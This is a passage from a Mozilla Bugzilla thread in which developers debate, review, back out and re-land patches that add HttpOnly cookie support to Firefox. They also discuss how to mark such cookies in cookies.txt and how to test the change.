Anyway, that's entirely irrelevant to whether or not we should implement an IE-compatible HTTPOnly.
Gerv
Comment 58•18 years ago
|
||
(In reply to comment #57)
> > 2) security="sandbox" attribute for all elements.
>
> This idea has been proposed many times. It's not really feasible for parts of a
> page, only for the whole page - when it reduces to Content Restrictions:
> http://www.gerv.net/security/content-restrictions/
>
Gerv, may I ask what specifically about that idea is not feasible? Is it related to the Moz core specifically, or if it's the idea in general, what is that reason? IMO That "proposed many times" idea seems to be the most practical yet flexible (allowing valid script to run) solution -- at least for site owners/authors.
Take the classic and concrete webmail example that we know so well, where there are plenty of the site's own valid scripts running, but the webmail author simply wants to disable any scripts inside the email content (inside of div foo). We know that it is most definitely is very, very dangerous (and very inefficient) to require the webmail writer to handle sanitizing for the foreign content (handle SCRIPT, all event handlers, agent variations in tag parsing, etc).
However as you say this is a separate issue from this bug, though I still believe subs@'s comment (insofar as sandboxing portions of a page) has merit, though it is not a complete solution - we also need the header based controls for simple browsing of untrusted uploaded files. And whether the sandbox div's scripts should run in an isolated domain or be disabled altogether is another topic.
It is noted that one technicality that subs@ didn't mention was the need for an opening and closing boundary/random string to prevent spoofing (this boundary could be created by client-JS in fact), ie by bad DOM structure in the email or merely closing the div.
Gerv, I agree that your proposal is very powerful and allows much finer-grained control. Although relative to the sandboxed-DIV idea it is seemingly more complex to implement (both in the agent, and site authors require access to response headers), potentially to learn, and there is more room for error by users (by nature of having more controls). Also its level of control may mean the spec must be evolved to support new/changing technologies (like embedded plugins).
I do know that for most cases, site owners who need to present foreign code would rather just completely disable scripting altogether -- and ideally only for the foreign code's block... instead of being relegated to pushing the foreign content into an iframe or JS/XmlHTTP include but from a sandbox domain as we do now.
Comment 59•18 years ago
|
||
I was about to write a reply, but Ken has pretty much said it all. (And yes, obviously random strings are needed for the sandbox boundaries.) I raised it in this bug because element-sandboxing + uploaded file restrictions would obviate the need for fixing this bug.
Comment 60•18 years ago
|
||
(In reply to comment #59)
> I raised it in this bug because element-sandboxing + uploaded file
> restrictions would obviate the need for fixing this bug.
No it wouldn't! HttpOnly is -already- used by sites and Firefox users would immediately benefit if this bug were implemented. Sites not already using it could start without re-writing any content whatsoever.
More complex sandboxing is great but no one benefits until the content is changed to take advantage of it.
Comment 61•18 years ago
|
||
(In reply to comment #60)
> No it wouldn't! HttpOnly is -already- used by sites and Firefox users would
> immediately benefit if this bug were implemented. Sites not already using it
> could start without re-writing any content whatsoever.
I hadn't considered that. I guess they are separate issues then. Sorry for the bugspam, all.
Comment 62•18 years ago
|
||
> > restrictions would obviate the need for fixing this bug.
>
> No it wouldn't! HttpOnly is -already- used by sites and Firefox users would
> immediately benefit if this bug were implemented. Sites not already using it
> could start without re-writing any content whatsoever.
>
> More complex sandboxing is great but no one benefits until the content is
> changed to take advantage of it.
>
I still think the http-only cookie ideas has some value (and I'd stated this in earlier comments), but have come to realize (after researching webmail and file-upload site santizing) that it is actually deeply inadequate. There are so, so may other attack vectors -- that http-only cookie doesn't even address 10% of them. Maybe less. The fact is that *any* foreign scripting access inside of one's domains is a grave, grave risk. So now, I think that while implementing this would do *some* good, the effort is much better spent implementing something new -- along the lines of header based policies, and also the sandboxing-div type of idea (the latter being more robust and flexible and natural (flexible) to mixed-domain environments IMO). And I don't believe you were bugspamming, subs@.
Comment 63•18 years ago
|
||
Let's fix this one. I'm assuming Firefox 3 is the only realistic milestone, given web compat constraints on Firefox 2.
Target Milestone: mozilla1.8alpha1 → mozilla1.9alpha
Comment 64•18 years ago
|
||
> Gerv, may I ask what specifically about that idea is not feasible?
I defer to the parser and layout hackers for a full explanation, but as I understand it, it's a combination of: it's hard to define securely where the block ends; it's hard to restrict the activities of script within a single page in the way required; it's hard to prevent the activities of script only having an effect in a particular area of the page.
In addition, we already have a well-defined system for including one type of content in another, with the possibility of establishing security boundaries - it's called an <iframe>. Microsoft has, I believe, got some security stuff you can invoke at that boundary. But again, it's two different documents, and so Content-Restrictions is, I believe, the way to go.
Note that one would not have to implement all of Content-Restrictions at once. And I designed it to fit with (as far as I understand it) our internal capabilities model.
But please, can we not discuss this in a bug which is entirely irrelevant to the idea?
Gerv
Comment 65•18 years ago
|
||
IBM has some internal apps that would benefit from httponly (because they use subdomains, etc. as described in comment 47) and they would really like to see httponly implemented in Firefox 2.0.0.x.
The only downside to implementing httponly (other than the need for coding and testing) is that it would give some other webmasters a false sense of security, right?
Comment 66•18 years ago
|
||
this patch sets up HttpOnly, but doesn't change ::Read or ::Write yet.
Comment 67•18 years ago
|
||
Attachment #252736 -
Attachment is obsolete: true
Comment 68•18 years ago
|
||
Attachment #252737 -
Attachment is obsolete: true
Updated•18 years ago
|
Attachment #252740 -
Attachment is patch: true
Attachment #252740 -
Attachment mime type: application/octet-stream → text/plain
Comment 69•18 years ago
|
||
(In reply to comment #65)
>
> The only downside to implementing httponly (other than the need for coding and
> testing) is that it would give some other webmasters a false sense of security,
> right?
The other concern is our policy on users that switch back and forth from an older version of Fx. I'm thinking we should do a one-time migration, with the caveat that any "clear cookies" operation will delete the old file as well.
Comment 70•18 years ago
|
||
Why do we need to migrate the file? The whole point of the ugly-as-sin comment-hack this patch implements is to avoid having to do that. If we're changing to a new file let's just change the actual format and not hack at it -- but then you're into bug 230933 (also see comment 43).
There is no web-compatibility reason not to support HttpOnly in 2.0.0.x. Switching to a whole new file might be a reason not to do it in 2.0.0.x (certainly not 2.0.0.2) since it raises a lot more issues and places to fail such as migration. If your target is Gecko 1.9 you ought to work on bug 230933 instead and include HttpOnly as a subset.
What happens if we treat HttpOnly cookies as session cookies and don't write them out at all? No file compatibility issues, it'd be easy. People would be arguably safer, but I guess wouldn't like having to log in all the time.
Comment 71•18 years ago
|
||
(In reply to comment #70)
> Why do we need to migrate the file? The whole point of the ugly-as-sin
> comment-hack this patch implements is to avoid having to do that. If we're
> changing to a new file let's just change the actual format and not hack at it
> -- but then you're into bug 230933 (also see comment 43).
"just". If we want to get this on the 2.0 branch, we shouldn't switch to an entirely new format, new parser, new dependencies, etc. If we want to go for bug 230933, that's an easy fix, but it shouldn't go on the branch.
>
> If your target is Gecko 1.9 you ought to work on bug 230933
> instead and include HttpOnly as a subset.
OK. Should we mark this wontfix, then?
>
> What happens if we treat HttpOnly cookies as session cookies and don't write
> them out at all? No file compatibility issues, it'd be easy. People would be
> arguably safer, but I guess wouldn't like having to log in all the time.
>
non-starter, imho.
Comment 72•18 years ago
|
||
(In reply to comment #71)
> "just". If we want to get this on the 2.0 branch, we shouldn't switch to an
> entirely new format, new parser, new dependencies, etc. If we want to go for
> bug 230933, that's an easy fix, but it shouldn't go on the branch.
Didn't I say that? My question was if we want it on the 2.0 branch (and I personally do) why do you need to migrate to a new file at all when the point of this bug's hack is to live in the same file?
> OK. Should we mark this wontfix, then?
No, regardless of file format this is a feature we want. Bug 230993 is "migrate cookies to a new format", this is still the HttpOnly part of it.
Comment 73•18 years ago
|
||
So does anyone have any suggestions on how we could do this on the 1.8 branch? Liek the idea of a second cookies file just to store the httponly characteristic? Or something else clever?
Comment 74•18 years ago
|
||
> why do you need to migrate to a new file at all when the point of this bug's hack is to live in the same file?
That's one of the points. The problem with putting them in the same file in a comment is that a user that turns on 1.5 will lose them (and possibly replace them with non-HttpOnly cookies), since it looks to me like the entire file is read into memory at startup and then overwritten on shutdown.
We need to decide on acceptable security and usability trade-offs.
1.) Is it OK for users that downgrade to lose their HttpOnly cookies? When they switch back to an HttpOnly-Enabled Fx, they may have non-HttpOnly cookies in their place. This may be acceptable, since it mirrors the situation in the initial upgrade.
2.) I think the initial patch's strategy of surrounding the cookies with comments is not good, since it will downgrade HttpOnly cookies to normal ones in older Fx versions. Better to lose them by placing the entire line in a comment. mkaply and dveditz: Agree?
(In reply to comment #73)
> So does anyone have any suggestions on how we could do this on the 1.8 branch?
> Liek the idea of a second cookies file just to store the httponly
> characteristic? Or something else clever?
That would have the same problem as #2 above. However, if #2 is OK, then it's something to consider.
Comment 75•18 years ago
|
||
Comment on attachment 252740 [details] [diff] [review]
nsCookieService::Write method altered
attachment 252737 [details] [diff] [review] is a better base to work from
Attachment #252740 -
Attachment is obsolete: true
Comment 76•18 years ago
|
||
I have another idea for a "clever hack". (Should work fine with older versions and not lose any information as well.) It should also work well with any 3rd party apps that don't deal with comments. (If it is even doable. I'm just throwing the idea out there.)
Say we have cookie "xyz" for domain "foo.com":
.foo.com TRUE / FALSE 1174939130 xyz abc
If we want to specify it as an httponly cookie we could add another cookie like so:
.$http_only.foo.com TRUE / FALSE 1174939130 xyz abc
I'm not sure what the parser allows here, but the idea is that $http_only is some "subdomain" that will never be used. That way it will never be sent to a server.
We could also just utilize the $http_only version and forget about the standard .foo.com behavior. That would make sure that this cookie is not used in older browsers, and yet still perserved. (If an older browser adds a non-$http_only version, it wouldn't matter as the older version could keep using it while the new browser version would utilize the $http_only version.)
Just another idea for you guys to chew on.
Comment 77•18 years ago
|
||
(In reply to comment #74)
> 2.) I think the initial patch's strategy of surrounding the cookies with
> comments is not good, since it will downgrade HttpOnly cookies to normal ones
> in older Fx versions. Better to lose them by placing the entire line in a
> comment. mkaply and dveditz: Agree?
... at which point the user will log in to the site again (while cursing the broken browser), and end up with a non-HttpOnly cookie just the same?
Comment 78•18 years ago
|
||
+1 to Josh’s suggested hack (.$http_only.domain.com)
Comment 79•18 years ago
|
||
(In reply to comment #77)
>
> ... at which point the user will log in to the site again (while cursing the
> broken browser), and end up with a non-HttpOnly cookie just the same?
Yes. But that assumes that the same cookie is issued to UAs that don't support HttpOnly. In otherwords, is the downgrade a concern?
Comment 80•18 years ago
|
||
This one stores HttpOnly cookies on a line prefixed with a comment, like so:
#HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
Doing it this way prevents nasty merge situations when going from old back to new. If we hacked HttpOnly so that it survives the use of an older browser (but isn't readable there), we would get merging situations like the following when the user went back to an HttpOnly-Enabled Fx:
$HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
.livejournal.com livejournal.com TRUE / FALSE 2342434534 ljuniq
Attachment #138799 -
Attachment is obsolete: true
Attachment #186756 -
Attachment is obsolete: true
Comment 81•18 years ago
|
||
(In reply to comment #80)
> This one stores HttpOnly cookies on a line prefixed with a comment, like so:
> #HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
> Doing it this way prevents nasty merge situations when going from old back to
> new. If we hacked HttpOnly so that it survives the use of an older browser (but
> isn't readable there), we would get merging situations like the following when
> the user went back to an HttpOnly-Enabled Fx:
>
> $HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
> .livejournal.com livejournal.com TRUE / FALSE 2342434534 ljuniq
I think the 'merge situation' could be good, because it allows us to know that we should just delete both cookies. Otherwise (with the comment method), we'll be using an unprotected cookie. (Because when we switch back up from the older browser, we now have an unprotected cookie. Thus we've lost our security.)
As an alternative, an $httponly.domain-capable browser could just always use the httponly version if it's there.
Also, I thought of a downside to this domain method. Current 3rd party applications will not be able to read the cookie unless we store it both ways. (.$httponly.domain and .domain) Not sure if that's a big issue or not. It may be arguable that the 3rd party application should be recoded to be aware of the httponly flag anyhow.
I'm happy with either solution really. More security is better than less and the percentage of users going from new->old->new is probably an insignificant percentage. Even the end-of-line comment hack would be fine with me, although I'm a bit worried how 3rd party apps might behave with that.
Comment 82•18 years ago
|
||
(In reply to comment #81)
>
> I think the 'merge situation' could be good, because it allows us to know that
> we should just delete both cookies. Otherwise (with the comment method), we'll
> be using an unprotected cookie.
Actually, it occurs to me that sending both is a change in web compatibility, so we can't do that according to the branch policy.
> (Because when we switch back up from the older
> browser, we now have an unprotected cookie. Thus we've lost our security.)
>
The initial upgrade will be much, much more common and you'll have to deal with it there anyway.
>
> I'm happy with either solution really. More security is better than less and
> the percentage of users going from new->old->new is probably an insignificant
> percentage.
I think that's how I feel too.
Updated•18 years ago
|
Attachment #252948 -
Flags: review?(benjamin)
Comment 83•18 years ago
|
||
(In reply to comment #82)
> Actually, it occurs to me that sending both is a change in web compatibility,
> so we can't do that according to the branch policy.
I didn't mean for both to be sent, but to delete both. (Or just send the httponly one.) Sending both is definitely out of the question.
> The initial upgrade will be much, much more common and you'll have to deal with
> it there anyway.
True. The comment method you use is probably simpler anyhow. Simpler = less prone to error. Thanks for taking the time to create a patch to get this bug moving.
My one concern: I have a feeling this might cause problems with some 3rd party programs such as download managers that pull cookie information to download under a certain session, but they should be able to adapt pretty quickly. Problems are probably bound to happen no matter what change is made to the cookies.txt file, though. (Including the end-of-line comment hack. I wouldn't be surprised if download managers don't check for comments at the end of line.)
On another note, and this should probably be a new bug, it'd be nice if the URL at the top of the cookies.txt file pointed to a URL that still works. I tried the following and it was non-existant:
http://www.netscape.com/newsref/std/cookie_spec.html
Comment 84•18 years ago
|
||
realized there's no reason to expose this to XPCOM
Attachment #252948 -
Attachment is obsolete: true
Attachment #252948 -
Flags: review?(benjamin)
Updated•18 years ago
|
Attachment #253178 -
Flags: review?(benjamin)
Comment 85•18 years ago
|
||
sorry for all the bugspam
Attachment #253178 -
Attachment is obsolete: true
Attachment #253179 -
Flags: review?(benjamin)
Attachment #253178 -
Flags: review?(benjamin)
Comment 86•18 years ago
|
||
My only question: while we are going to the effort of hacking the format around, is it worth trying to make it more extensible in the future, just in case we are still using cookies.txt when (to pick a random, vaguely plausible example) we decide to send cookies served over EV SSL connections only over EV, and therefore require an "EVOnly" attribute?
Instead of:
+ * #HttpOnly_host \t isDomain \t path \t secure \t expires \t name \t cookie
How about:
+ * #ExtendedFormat version=2,httpOnly=1,name=value \t host \t isDomain ...
?
version must be the first entry in the new comma-separated param list, unknown version cookies are ignored, unknown name/value pairs are ignored, all the usual compatibility stuff.
This would require:
- Change the prefix
- Write the current version
- Split and parse the new params section
Even if we don't do this, let's separate "#HttpOnly" from the domain by a \t (the standard separator for the file) rather than an underscore.
Gerv
Comment 87•18 years ago
|
||
(In reply to comment #86)
> My only question: while we are going to the effort of hacking the format
> around, is it worth trying to make it more extensible in the future
I don't think so. Instead, bug 230933 should block Fx3.
Comment 88•18 years ago
|
||
(In reply to comment #86)
> My only question: while we are going to the effort of hacking the format
> around, is it worth trying to make it more extensible in the future
<zombie type="coming to eat you">
Noooooooo.....!
</zombie>
That is exactly what's been stalling this bug for years: waiting for the magic extensible file format that never gets written. Please let's just do a narrow HttpOnly comment-hack extension.
I'm with Gerv in preferring HttpOnly\t to HttpOnly_ on consistency/aesthetic grounds, but I don't really care all that much at this point if arguing about it further delays this feature.
Comment 89•18 years ago
|
||
Comment on attachment 253179 [details] [diff] [review]
fix nits / don't change interface
r=dveditz
Attachment #253179 -
Flags: review+
Comment 90•18 years ago
|
||
Should nsICookie2 be modified, to add the httponly attribute, so you can get
it? (not that there are any callers yet, but that might change. Maybe
extensions want to use it)
(In reply to comment #81)
> I think the 'merge situation' could be good, because it allows us to know that
> we should just delete both cookies. Otherwise (with the comment method), we'll
> be using an unprotected cookie. (Because when we switch back up from the older
> browser, we now have an unprotected cookie. Thus we've lost our security.)
I don't see this remark being answered here. I think it is a good remark, and
should be reflected into what we do.
A related question: What happens to your existing cookies when upgrading? The
http-only cookie might very well be already in your cookies.txt, but not marked
as http-only. If you visit the site, and it will re-set the cookie, will the
(now http-only) cookie overwrite the existing cookie, or be added as a new
cookie?
Comment 91•18 years ago
|
||
Comment on attachment 253179 [details] [diff] [review]
fix nits / don't change interface
The code looks fine. I'm not making a policy decision of course.
Attachment #253179 -
Flags: review?(benjamin) → review+
Comment 92•18 years ago
|
||
It would be very nice to have unit tests for this... we already have a few cookie tests, so I think there's already a framework in place.
Comment 93•18 years ago
|
||
Is this ready to go in on the trunk then for some baking?
Comment 94•18 years ago
|
||
(In reply to comment #93)
> Is this ready to go in on the trunk then for some baking?
No, it needs test coverage.
I also see some points raised by mvl in comment #90, and he's in the blame for this file. It looks to me like all of the points he raises would need additional code, and change very little of what's in my patch. So, I propose that the patch goes on trunk, with the possibility of additional changes from mvl or someone else (I won't be doing more).
Comment 95•18 years ago
|
||
Reading the code some more, I now thing that my issue in comment 90 isn't that much of an issue. A cookie that gets re-set will always overwrite the old cookies. And because the http-only attribute isn't taken into account when looking for an existing cookie, the unprotected cookie will get overwritten by a protected one.
Adding the attribute to nsICookie2 should be like 2 lines of code. (plus some comments documenting it.) I think we should do that.
Comment 96•18 years ago
|
||
I've added the nsCookie2 change to this patch. I didn't rev the ID for nsCookie2 since it wasn't changed last time.
Comment 97•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
asking for review of just the cookie2 change
Attachment #256810 -
Flags: review?(mvl)
Comment 98•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
r=mvl on the nsICookie2 changes.
Attachment #256810 -
Flags: review?(mvl) → review+
Comment 99•18 years ago
|
||
Checked in. Once this is baked, I'll ask for 1.8 branch approval.
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Comment 100•18 years ago
|
||
(In reply to comment #99)
> Checked in. Once this is baked, I'll ask for 1.8 branch approval.
>
This code doesn't have SR and doesn't have the unit tests required by comment #94. Please back it out until both of those conditions are met.
Comment 101•18 years ago
|
||
(In reply to comment #100)
> This code doesn't have SR and doesn't have the unit tests required by comment
> #94. Please back it out until both of those conditions are met.
Both dan veditz and bsmedberg are super reviewers, and both reviewed the code.
As far as the unit tests go, creating a unit test for this is server dependent so it can't necessarily even be created on servers where Mozilla testcases are even run.
Are the mozilla servers running PHP 5.2?
Comment 102•18 years ago
|
||
(In reply to comment #101)
> (In reply to comment #100)
> > This code doesn't have SR and doesn't have the unit tests required by comment
> > #94. Please back it out until both of those conditions are met.
>
> Both dan veditz and bsmedberg are super reviewers, and both reviewed the code.
>
Doesn't matter. It's not clear that this patch is OK with everyone from reading the comments. An SR+ will make that decision.
> As far as the unit tests go, creating a unit test for this is server dependent
Not true. We have lots of tests for cookie parsing, but none for this. So, back it out please.
Comment 103•18 years ago
|
||
fwiw, your nsICookie2 needs a new IID...
Comment 104•18 years ago
|
||
(In reply to comment #103)
> fwiw, your nsICookie2 needs a new IID...
Any idea why when dwitte added a parameter, he didn't rev it:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=nsICookie2.idl&branch=&root=/cvsroot&subdir=mozilla/netwerk/cookie/public&command=DIFF_FRAMESET&rev1=1.2&rev2=1.3
> > As far as the unit tests go, creating a unit test for this is server dependent
> Not true. We have lots of tests for cookie parsing, but none for this.
> So, back it out please.
Please point me to these testcases please. I can't find them on mozilla.org
Also, what version of PHP do we have on the server. Testing httpOnly requires a specific SERVER change, you can't just write an HTML testcase.
Comment 105•18 years ago
|
||
> Any idea why when dwitte added a parameter, he didn't rev it
We weren't as careful about binary compatibility in 2003, IIRC.
Comment 106•18 years ago
|
||
(In reply to comment #104)
>
> Please point me to these testcases please. I can't find them on mozilla.org
http://lxr.mozilla.org/seamonkey/source/netwerk/test/TestCookie.cpp
This is beside the point, btw.
comment #93: Is this ready to go in on the trunk then for some baking?
comment #94: No, it needs test coverage.
comment #99: Checked in. Once this is baked, I'll ask for 1.8 branch approval.
Was there something unclear about comment #94?
Comment 107•18 years ago
|
||
note that we've got a webserver written in JS for unit tests, see netwerk/test/httpserver.
Comment 108•18 years ago
|
||
I backed out this patch--it shouldn't go out in the nightlies with so many unanswered questions. We can get it some other day. I haven't seen satisfactory explanations for the lack of SR, binary incompatibility, or lack of unit tests. Maybe tomorrow, I won't get lectured on the basics of the my patch, though I will note it would be pretty foolish to land it if you don't think I understand it.
Checking in public/nsICookie2.idl;
/cvsroot/mozilla/netwerk/cookie/public/nsICookie2.idl,v <-- nsICookie2.idl
new revision: 1.5; previous revision: 1.4
done
Checking in src/nsCookie.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.cpp,v <-- nsCookie.cpp
new revision: 1.11; previous revision: 1.10
done
Checking in src/nsCookie.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.h,v <-- nsCookie.h
new revision: 1.13; previous revision: 1.12
done
Checking in src/nsCookieService.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.cpp,v <-- nsCookieService.cpp
new revision: 1.51; previous revision: 1.50
done
Checking in src/nsCookieService.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.h,v <-- nsCookieService.h
new revision: 1.22; previous revision: 1.21
done
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Comment 109•18 years ago
|
||
PHP Unit test. Will work on any server
Comment 110•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
darin
Attachment #256810 -
Flags: superreview?
Comment 111•18 years ago
|
||
(In reply to comment #109)
> Created an attachment (id=256993) [details]
> Unit test
>
> PHP Unit test. Will work on any server
>
The unit test needs to run in the |make check| target, like the ones I linked.
Comment 112•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
You should change the UUID of nsICookie2 since it's vtable is changing.
Looks good, otherwise.
Updated•18 years ago
|
Attachment #256993 -
Flags: review-
Comment 113•18 years ago
|
||
(In reply to comment #111)
> The unit test needs to run in the |make check| target, like the ones I linked.
>
I've looked through that file, and testing this in there really doesn't make sense.
What exactly are you looking to be tested? I know you are saying "unit test" but what do you mean in this context.
I realize my testcase is technically a "function test".
Instead of complaining about the lack of test coverage, why don't you lend a hand considering you were involved six out of the nine patches in this bug?
Comment 114•18 years ago
|
||
If you want to write a testcase in TestCookie.cpp, you can check for a difference between calling getCookieString and getCookieStringFromHttp on nsICookieService. The first should not return httponly cookies.
Besides, there should a comment in nsICookieService that explains the difference. Originally, both returned the same, so one was mostly redundant (and the comment says so). It is no longer redundant, so that comment should be removed.
Comment 115•18 years ago
|
||
this test uses TestCookie to test the functionality. I've also updated cookie service to indicate that those functions are not redundant.
When this is rechecked in, I will also use a new UID.
Attachment #256993 -
Attachment is obsolete: true
Attachment #257378 -
Flags: review?
Updated•18 years ago
|
Attachment #257378 -
Flags: review? → review?(sayrer)
Comment 116•18 years ago
|
||
Comment on attachment 257378 [details] [diff] [review]
Unit test using TestCookie
Thank you.
Attachment #257378 -
Flags: review?(sayrer) → review+
Comment 117•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
That comment from darin was a super review that I specifically asked for.
Attachment #256810 -
Flags: superreview? → superreview+
Updated•18 years ago
|
Status: REOPENED → RESOLVED
Closed: 18 years ago → 18 years ago
Resolution: --- → FIXED
Comment 118•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
This baked on the trunk for a while. It would be a real nice to have on the 1.8 branch. I realize it is an interface change. In theory, that change could be left off on the branch...
Attachment #256810 -
Flags: approval1.8.1.4?
Comment 119•18 years ago
|
||
something went wrong, the cookies are not send back or so.
bug #315699 comment #32
> I can consistently encounter this bug using build Mozilla/5.0 (Windows; U;
> Windows NT 5.1; en-US; rv:1.9a3pre) Gecko/20070321 Minefield/3.0a3pre, on the
> site http://forums.beyondunreal.com, which uses vBulletin Version 3.6.5.
>
vBulletin uses httponly for cookies that contain your userid,
password-hash and sessionhash since vB 3.6.1. Login works normally in IE 7, which supports httponly cookies.
Comment 120•18 years ago
|
||
looks like one of us (probably me) transposed some parameters. see bug 375488.
Depends on: 375488
Comment 121•18 years ago
|
||
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
not approving this patch for the branch. Would need a patch that
- doesn't change interfaces (you can add ugly _MOZILLA_1_8_BRANCH interfaces if you need to)
- incorporates regression fix for bug 375488
Attachment #256810 -
Flags: approval1.8.1.4? → approval1.8.1.4-
Updated•18 years ago
|
Flags: wanted1.8.1.x+
Comment 122•18 years ago
|
||
Actually, this patch uses cookie changes that were a part of bug 295994 (security sensitive). I'm looking at the port this patch to not use the changes in 295994. Any help would be appreciated.
Comment 123•18 years ago
|
||
The problem is that there was no way to convey the fact that you were calling GetCookieString vs GetCookieStringFromHttp
My solution was to add a GetCookieStringFromHttpInternal that takes the extra parameter that indicates who called us.
With this change, I was able to use most of the other code.
I also had to use the MOZILLA_1_8_BRANCH hack.
I've tested this and it works as designed.
Comment 124•18 years ago
|
||
(In reply to comment #123)
> Created an attachment (id=260051) [details]
> Patch for the 1.8 branch
>
> The problem is that there was no way to convey the fact that you were calling
> GetCookieString vs GetCookieStringFromHttp
>
> My solution was to add a GetCookieStringFromHttpInternal that takes the extra
> parameter that indicates who called us.
>
> With this change, I was able to use most of the other code.
>
> I also had to use the MOZILLA_1_8_BRANCH hack.
>
> I've tested this and it works as designed.
>
hm, but names of all cookies are missing.
example:
#HttpOnly_ FALSE / FALSE 1206921018 bbuserid 208
FALSE / FALSE 1206921018 bblastactivity 0
Comment 125•18 years ago
|
||
(In reply to comment #124)
> hm, but names of all cookies are missing.
>
> example:
> #HttpOnly_ FALSE / FALSE 1206921018 bbuserid 208
> FALSE / FALSE 1206921018 bblastactivity 0
>
name <> domain
Comment 126•18 years ago
|
||
same as previous patch by Michael Kaply but fixed the missing cookie-domain ;-)
Comment 127•18 years ago
|
||
(In reply to comment #126)
> Created an attachment (id=260254) [details]
> Patch for the 1.8 branch (fixed)
>
> same as previous patch by Michael Kaply but fixed the missing cookie-domain ;-)
>
doh. Bad cut and paste when I was merging that part of the patch.
What do folks thing of this approach in general? to minimize change on the 1.8 branch?
Updated•18 years ago
|
Attachment #260254 -
Flags: superreview?(darin.moz)
Attachment #260254 -
Flags: review?(mvl)
Comment 128•18 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
I don't see why you can't use the same approach as on trunk (with CookieStringFromArray instead of GetCookieStringFromHttpInternal)
What's the main difference? I would prefer to use the already tested trunk code on branch, instead of trying something new.
Comment 129•18 years ago
|
||
To quote bsmedberg from the other bug:
> Since 1.8 is past and this is significantly risky, I'm going to let this sit
> and wait for supercookies to develop before proceeding.
The bug (bug 295994) that made the GetCookieStringFromList change was totally unrelated to this and there must be a reason bsmedberg never put it on the branch, especially since it is a security sensitive bug.
Updated•18 years ago
|
Attachment #260254 -
Flags: superreview?(darin.moz) → superreview+
Comment 130•18 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
ok, r=mvl
Attachment #260254 -
Flags: review?(mvl) → review+
Comment 131•18 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Probably too late for 1.8.1.4, and not even sure there's buy-in to get this on the branch, but nominating anyway.
Attachment #260254 -
Flags: approval1.8.1.4?
Comment 132•18 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Feel better waiting until early next release than trying to rush this in now.
Attachment #260254 -
Flags: approval1.8.1.4? → approval1.8.1.5?
Updated•18 years ago
|
Flags: blocking1.8.1.5?
Comment 133•17 years ago
|
||
Are there any plans to apply this soon?
I'm just asking because Firefox 2.0.0.4 just came out, and it hasn't been applied, and it would seem that you've already got the patch ready, etc.....
Updated•17 years ago
|
Flags: blocking1.8.1.5? → blocking1.8.1.5+
Comment 134•17 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
approved for 1.8.1.5, a=dveditz for release-drivers
Attachment #260254 -
Flags: approval1.8.1.5? → approval1.8.1.5+
Comment 135•17 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Hang on, unapproving while we check out if we have the scope to get this in this time.
Attachment #260254 -
Flags: approval1.8.1.5+ → approval1.8.1.5?
Comment 136•17 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
approved for 1.8.1.5, a=dveditz for release-drivers
Attachment #260254 -
Flags: approval1.8.1.5? → approval1.8.1.5+
Comment 137•17 years ago
|
||
Should we take any other httponly patches with this like bug 384872?
Comment 138•17 years ago
|
||
bug 383181 should be taken on branch, i'll post patches for both trunk and branch in there.
Comment 139•17 years ago
|
||
Those are on the blocking list, we'll approve them when we get patches (more concerned about bug 383181, though 384872 would be nice too). Are there others?
Updated•17 years ago
|
Depends on: CVE-2009-0357
Comment 140•17 years ago
|
||
checked in on 1.8 branch. thanks mkaply and ronnie!
Keywords: fixed1.8.1.5
Updated•17 years ago
|
Attachment #260254 -
Flags: approval1.8.0.13?
Updated•17 years ago
|
Attachment #260254 -
Flags: approval1.8.0.13? → approval1.8.0.14?
Updated•17 years ago
|
Keywords: dev-doc-needed
Comment 141•17 years ago
|
||
Since we don't actually document the attributes of cookies, I'm calling this documented with the addition of a note to the Fx3 for developers page. If anyone can think of other places it should be mentioned (I spent a few hours trying to find them), let me know.
Keywords: dev-doc-needed → dev-doc-complete
Comment 142•17 years ago
|
||
(In reply to comment #141)
> Since we don't actually document the attributes of cookies, I'm calling this
> documented with the addition of a note to the Fx3 for developers page. If
> anyone can think of other places it should be mentioned (I spent a few hours
> trying to find them), let me know.
Hmm... this seems bad. ;)
Should we be documenting the mozilla implementation of cookies somewhere? How attributes are interpreted, applied, etc? I think most webdevs just test firefox to figure out how things work, which is probably prudent but also inefficient. And the spec (RFC2109) isn't that useful, since we deviate from it (and rightly so) in many ways; it's also outdated (e.g. this bug).
Sheppy, any opinion here?
Comment 143•17 years ago
|
||
Yes, we need documentation on our cookies implementation, but at present we don't have any. If someone would like to write some up, please do... otherwise, could someone please file a bug against MDC and include some pointers to information resources that will help when someone has time to do the writing?
Comment 144•17 years ago
|
||
bug 398441 filed for documentation.
Updated•17 years ago
|
Attachment #260254 -
Flags: approval1.8.0.14? → approval1.8.0.15?
Comment 145•17 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
